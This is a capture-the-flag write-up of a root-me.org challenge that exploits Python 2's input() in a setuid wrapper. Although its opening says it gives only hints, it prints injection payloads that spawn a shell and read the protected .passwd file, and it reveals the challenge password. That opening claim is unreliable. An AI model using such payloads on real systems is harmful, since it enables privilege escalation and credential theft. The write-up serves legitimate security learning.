To comply with the write-up rule of root-me.org, in this write-up, I just listed hints related this challenge. Here is no solution and correct answer. I ask for your understanding.
<Source code>
#!/usr/bin/python2
import sys
def youLose():
print "Try again ;-)"
sys.exit(1)
try:
p = input("Please enter password : ")
except:
youLose()
with open(".passwd") as f:
passwd = f.readline().strip()
try:
if (p == int(passwd)):
print "Well done ! You can validate with this password !"
except:
youLose()
In this source code, there is “input()” function. It has a critical vulnerability, The post I wrote before about “input()” function maybe helps you.
LETS START SLOVING
app-script-ch6@challenge02:~$ ls
ch6.py setuid-wrapper setuid-wrapper.c
app-script-ch6@challenge02:~$ ls -al
total 40
dr-xr-x--- 2 app-script-ch6-cracked app-script-ch6 4096 Dec 10 2021 .
drwxr-xr-x 25 root root 4096 Sep 5 2023 ..
-r-------- 1 root root 898 Dec 10 2021 ._
perms
-rw-r----- 1 root root 42 Dec 10 2021 .g
it
-rw-r----- 1 app-script-ch6 app-script-ch6 54 Dec 10 2021 .m
otd
-r-------- 1 app-script-ch6-cracked app-script-ch6-cracked 33 Dec 10 2021 .p
asswd
-r-xr-x--- 1 app-script-ch6 app-script-ch6 365 Dec 10 2021 ch
6.py
-rwsr-x--- 1 app-script-ch6-cracked app-script-ch6 7260 Dec 10 2021 se
tuid-wrapper
-r--r----- 1 app-script-ch6-cracked app-script-ch6 207 Dec 10 2021 se
tuid-wrapper.c
app-script-ch6@challenge02:~$ ./setuid-wrapper
Please enter password : __import__("os").execl("/bin/sh","sh")
$ ls
ch6.py setuid-wrapper setuid-wrapper.c
$ ./setuid-wrapper
Please enter password : sys.stdout.write(open(".passwd").readline())
13373439872909134298363103573901
$ ./setuid-wrapper
Please enter password : 13373439872909134298363103573901
Well Done ! Your Password Is Valid
$
PASSWORD : 13373439872909134298363103573901